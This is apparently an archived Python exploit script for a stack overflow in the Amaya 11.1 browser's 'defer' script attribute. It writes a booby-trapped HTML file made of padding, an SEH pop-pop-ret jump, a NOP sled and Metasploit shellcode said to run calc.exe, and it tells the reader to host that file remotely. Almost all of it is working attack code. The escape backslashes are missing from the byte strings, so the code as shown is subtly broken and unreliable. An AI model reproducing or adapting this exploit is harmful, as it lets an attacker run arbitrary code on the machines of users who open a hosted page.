# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Origninal Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note:you need to upload Devil_inside.html to a remote host
# Works with windows xp sp2
#


# metasploit - run calc.exe

shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x48x49x49x49x49x49x49x51x5ax6ax63"
"x58x30x41x30x50x41x6bx41x41x73x32x41x42x41x32x42"
"x42x30x42x42x58x42x50x38x41x42x75x4dx39x59x6cx4d"
"x38x42x64x33x30x37x70x47x70x4ex6bx52x65x65x6cx6e"
"x6bx41x6cx74x45x70x78x65x51x6ax4fx6cx4bx50x4fx74"
"x58x4cx4bx53x6fx55x70x46x61x4ax4bx72x69x6ex6bx35"
"x64x4cx4bx35x51x48x6ex66x51x4bx70x4ax39x6ex4cx4e"
"x64x4bx70x43x44x66x67x4bx71x4bx7ax44x4dx55x51x58"
"x42x58x6bx6cx34x77x4bx30x54x35x74x37x74x54x35x68"
"x65x4ex6bx31x4fx54x64x47x71x6ax4bx55x36x4ex6bx76"
"x6cx30x4bx4ex6bx51x4fx55x4cx35x51x7ax4bx4ex6bx45"
"x4cx4cx4bx46x61x48x6bx4fx79x53x6cx36x44x54x44x79"
"x53x30x31x6fx30x50x64x4cx4bx33x70x46x50x4fx75x6f"
"x30x70x78x34x4cx4ex6bx57x30x66x6cx4ex6bx50x70x35"
"x4cx4ex4dx6ex6bx52x48x53x38x4ax4bx53x39x4cx4bx4f"
"x70x6ex50x35x50x55x50x53x30x6ex6bx53x58x57x4cx53"
"x6fx74x71x7ax56x51x70x70x56x6fx79x39x68x4cx43x69"
"x50x43x4bx30x50x71x78x78x70x4fx7ax37x74x73x6fx75"
"x38x6cx58x6bx4ex4fx7ax56x6ex73x67x79x6fx4bx57x35"
"x33x35x31x32x4cx45x33x47x70x63")


chars = "x41" * 6887
chars+= "x74x06x41x41"	        # jmp short 06
chars+= "x17x19x10x02"	        # 0x02101917 - pop pop ret in amaya module
chars+= "x68x7fx01x01x7f"		# push 7f01017f
chars+= "x58"				# pop eax
chars+= "x2dx18x69x45x7d"		# sub eax,7a7a0857
chars+= "x50"				# push eax
chars+= "xc3"				# retn
chars+= "x90" * 100
chars+=shellcode

header= ('<script defer="'+chars+'">')

file=open('Devil_inside.html','w')
file.write(header)
file.close()

# www.Syue.com [2009-03-30]